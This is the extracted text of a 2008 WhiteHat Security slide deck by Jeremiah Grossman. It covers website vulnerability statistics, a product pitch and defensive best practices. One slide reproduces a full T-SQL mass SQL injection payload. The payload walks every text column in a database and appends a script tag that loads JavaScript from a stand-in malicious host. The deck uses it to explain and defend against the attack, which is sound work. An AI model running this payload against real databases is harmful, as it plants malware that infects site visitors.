Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.” Jeremiah Grossman WhiteHat Security founder & CTO © 2008 WhiteHat Security, Inc. 2 Jeremiah Grossman WhiteHat Security Founder & CTO Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007) Frequent international conference speaker Co-founder of the Web Application Security Consortium Co-author: Cross-Site Scripting Attacks Former Yahoo! information security officer © 2008 WhiteHat Security, Inc. Official Title “the hacker yahoo” Job Description: Hack Everything! 3 Protect this website and the ~599 others Find the vulnerabilities before the bad guys 4 5 6 WhiteHat Sentinel • Unlimited Assessments – customer controlled and expert managed – the ability to scan websites no matter how big or how often they change • Coverage – authenticated scans to identify technical vulnerabilities and custom testing to uncover business logical flaws • Virtually Eliminate False Positives – Operations Team verifies results and assigns the appropriate severity and threat rating • Development and QA – WhiteHat Satellite Appliance allows us to service intranet accessible systems remotely • Improvement & Refinement – real-world scans enable fast and efficient updates © 2008 WhiteHat Security, Inc. 7 Custom Web Applications, Custom Vulnerabilities Vulnerability Stack WhiteHat Security “well-known” vulnerabilities Symantec Qualys Nessus nCircle Data is unique from reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others. These organizations track publicly disclosed vulnerabilities in commercial and open source software products, which may contain Web application flaws as well. WhiteHat Security’s data is different because it focuses solely on previously unknown vulnerabilities in custom web applications, code unique to that organization, on real-world websites © 2008 WhiteHat Security, Inc. 168,000,000 websites millions more added per month 8 809,000 websites use SSL protecting password, credit card numbers, social security numbers, and our email (if we’re lucky). 9 9 out of 10 websites have vulnerabilities allowing hackers unauthorized access 10 hacked 11 Over 79% of websites hosting malicious code are legitimate (compromised by attackers) A new infected Web page is discovered every: 5 seconds 24 hours a day 365 days a year 12 WhiteHat Security: Top 10 Likelihood that a website has a vulnerability, by Class © 2008 WhiteHat Security, Inc. 13 But how bad is it really? Likelihood that a website has a vulnerability, by severity Websites with Urgent, Critical, or High severity issues technically would not pass PCI compliance © 2008 WhiteHat Security, Inc. 14 Another way to look at the badness Percentage of vulnerabilities ranked by severity © 2008 WhiteHat Security, Inc. 15 Overall vulnerability population © 2008 WhiteHat Security, Inc. 16 Technology Breakdown file extensions © 2008 WhiteHat Security, Inc. 17 Industry Verticals 18 Percentage of websites with either URGENT, CIRTICAL or HIGH severity vulnerabilities ranked by industry © 2008 WhiteHat Security, Inc. Worst of the Worst Percentage of vulnerability classes in overall population ranked by industry © 2008 WhiteHat Security, Inc. 19 20 Data input correlation Average inputs per website:154 Ratio of vulnerability/inputs: 2.2% © 2008 WhiteHat Security, Inc. Average Time to Fix in Days 180 270 21 365 More major websites were launched before significant classes of attack were “well-known” Website Founded Vulnerability Attack Amazon 1994 Buffer Overflow 1996 Yahoo 1995 Command Injection 1996 eBay 1995 SQL Injection 2004 Bank of America 1997 XSS 2005 Google 1998 Predictable Resource Location ? MySpace 2003 HTTP Response Splitting 2005 / ? YouTube 2005 CSRF 22 ? If there’s just 1 vulnerability on 90% of the SSL websites... Other reports say an average of 7 728,100 total vulnerabilities 23 XSSed.com has reported: 20,843 total vulnerabilities 1,072 fixed (5%) 24 25 Mass SQL Injection 1. Google recon for weak websites (*.asp, *.php) 2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs. 3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server infecting their machine with trojans. 4. Botnets form with then continue SQL injecting websites 26 DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; 27 28 2006, 0.3% of all Internet queries return at least one URL containing malicious content. 2007 - 1.3% 2008 - ? 29 30 31 32 Best Practices Asset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can’t secure what you don’t know you own. Measure Security – Perform rigorous and on-going vulnerability assessments, preferably every week. Because you can’t secure what you can’t measure. Development Frameworks – Provide programmers with software development tools enabling them to write code rapidly that also happens to be secure. Because, you can’t mandate secure code, only help it. Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 9 in 10 websites are already insecure, no need to make it any easier. © 2008 WhiteHat Security, Inc. Thank You For more information visit: www.whitehatsec.com/ Jeremiah Grossman, founder and CTO blog: http://jeremiahgrossman.blogspot.com/ email: [email protected]